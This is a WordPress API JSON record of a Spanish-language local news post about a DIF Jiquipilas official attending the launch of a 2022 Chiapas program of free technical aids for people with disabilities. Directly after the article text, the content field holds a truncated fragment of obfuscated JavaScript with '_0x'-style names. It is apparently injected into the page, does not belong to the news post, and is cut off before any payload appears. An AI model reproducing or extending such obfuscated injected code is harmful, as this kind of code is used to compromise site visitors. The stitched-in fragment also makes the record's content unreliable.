{"id":3048,"date":"2022-06-20T02:19:51","date_gmt":"2022-06-20T02:19:51","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3048"},"modified":"2022-06-20T02:19:52","modified_gmt":"2022-06-20T02:19:52","slug":"asiste-madely-montejo-arranque-del-proyecto-de-ayudas-tecnicas-con-discapacidades-2022","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3048","title":{"rendered":"Asiste Madely Montejo arranque del proyecto de ayudas t\u00e9cnicas con discapacidades 2022"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220619-WA0034-1024x683.jpg\" alt=\"\" class=\"wp-image-3050\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220619-WA0034-1024x683.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220619-WA0034-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220619-WA0034-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220619-WA0034.jpg 1500w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u2022 Gobernador Rutilio Escand\u00f3n Cadenas favorece a la inclusi\u00f3n y bienestar social<\/p>\n\n\n\n<p>\u2022 La Presidenta del DIF Jiquipilas Refrend\u00f3 su compromiso de continuar trabajando por el bienestar de las familias jiquipiltecas.<\/p>\n\n\n\n<p>19 de Junio del.2022.  Jiquipilas, Chiapas.-. Con pol\u00edticas publicas que emanen en el gobierno estatal para contribuir a la inclusi\u00f3n social, mejor calidad de vida y garantizar el derecho a apoyos gratuitos, la presidenta del DIF Jiquipilas Madely Montejo Maza atestigu\u00f3 el arranque del proyecto de ayudas t\u00e9cnicas con discapacidades 2022.El gobernador mencion\u00f3 que se trabaja con la intenci\u00f3n se incluir a todas y todos los Chiapanecos, fascilitando sus movimientos con ayuda t\u00e9cnica de acuerdo a la necesidad; as\u00ed contribuir a una mejor calidad de vida y favoreces a la econom\u00eda, ya que los recursos p\u00fablicos se entregan de manera directa y gratuita.Madely Montejo agradeci\u00f3 este gran gesto por parte del ejecutivo del estado, quien siempre ha logrado buenas gestiones sociales y que hoy sin duda el bienestar esta al alcance y a la vista de cada uno y una; mencion\u00f3 que a trav\u00e9s de los lineamientos y pol\u00edticas p\u00fablicas ha desarrollado un plan estatal de muchos beneficios.Tambi\u00e9n extern\u00f3 su agradecimiento y reconocimiento a Deliamaria Gonz\u00e1lez Flandes por lograr un Chiapas de coraz\u00f3n y abonar a una transformaci\u00f3n de resultados donde todos y todas gocen d ellos beneficios.Jiquipilas ha sido beneficiado en m\u00faltiples ocasiones, manteniendo la comunicaci\u00f3n con la dependencia del Instituto de protecci\u00f3n social y beneficencia p\u00fablica que favorece las gestiones para lograr proyecciones ben\u00e9ficas. Por \u00faltimo Madely Montejo refrend\u00f3 su compromiso de continuar trabajando por el bienestar de las familias jiquipiltecas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 Gobernador Rutilio Escand\u00f3n Cadenas favorece a la inclusi\u00f3n y bienestar social \u2022 La Presidenta del DIF Jiquipilas Refrend\u00f3 su compromiso de continuar trabajando por el bienestar de las familias jiquipiltecas. 19 de Junio del.2022. Jiquipilas, Chiapas.-. Con pol\u00edticas publicas que emanen en el gobierno estatal para contribuir a la inclusi\u00f3n social, mejor calidad de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3050,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-3048","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3048","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3048"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3048\/revisions"}],"predecessor-version":[{"id":3051,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3048\/revisions\/3051"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3050"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3048"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3048"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3048"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}